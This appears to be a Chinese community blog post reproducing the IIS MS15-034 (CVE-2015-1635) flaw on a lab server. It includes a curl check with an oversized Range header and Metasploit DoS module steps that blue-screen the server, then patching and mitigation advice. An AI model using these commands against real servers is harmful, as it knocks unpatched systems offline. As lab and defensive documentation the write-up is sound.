CVE-2015-1635（MS15-034 ）远程代码执行漏洞复现、验证和修复-CFANZ编程社区

CVE-2015-1635（MS15-034 ）远程代码执行漏洞复现、验证和修复

一、测试环境

ip: 192.168.80.200

操作系统：win2012

中间件：IIS8.5

二、漏洞背景

CVE-2015-1635（MS15-034 ）远程代码执行漏洞复现、验证和修复_服务器

漏洞详细参考如下信息：

https://docs.microsoft.com/zh-cn/security-updates/Securitybulletins/2015/ms15-034

三、验证

在验证机机发送如下代码：

curl -v 192.168.80.200 -H "Host:irrelevant" -H "Range:bytes=0-18446744073709551615"

CVE-2015-1635（MS15-034 ）远程代码执行漏洞复现、验证和修复_服务器_02

报HTTP Error 416. The requested range is not satisfiable状态码，证明此处存在此漏洞。

四、验证机利用

工具用Metasploit(MSF)。

1. 利用search ms15-034命令搜索MFS模块

CVE-2015-1635（MS15-034 ）远程代码执行漏洞复现、验证和修复_microsoft_03

两个模块

0 ddos验证机

1 读取内存信息

2. 使用use auxiliary/dos/http/ms15_034_ulonglongadd调用模块0

CVE-2015-1635（MS15-034 ）远程代码执行漏洞复现、验证和修复_服务器_04

3. 使用SET设置参数

CVE-2015-1635（MS15-034 ）远程代码执行漏洞复现、验证和修复_蓝屏_05

如果是默认，直接run，服务器会瞬间蓝屏，然后重启，如果是改成set therads 10，服务器会长时间蓝屏。

4. 使用RUN 运行

CVE-2015-1635（MS15-034 ）远程代码执行漏洞复现、验证和修复_microsoft_06

五、结果

CVE-2015-1635（MS15-034 ）远程代码执行漏洞复现、验证和修复_microsoft_07

六、防御措施

1.打补丁

https://docs.microsoft.com/zh-cn/security-updates/Securitybulletins/2015/ms15-034

2.临时禁用IIS内核缓存

CVE-2015-1635（MS15-034 ）远程代码执行漏洞复现、验证和修复_microsoft_08

CVE-2015-1635（MS15-034 ）远程代码执行漏洞复现、验证和修复_蓝屏_09

0 条评论

CVE-2015-1635（MS15-034 ） 远程代码执行漏洞复现、验证和修复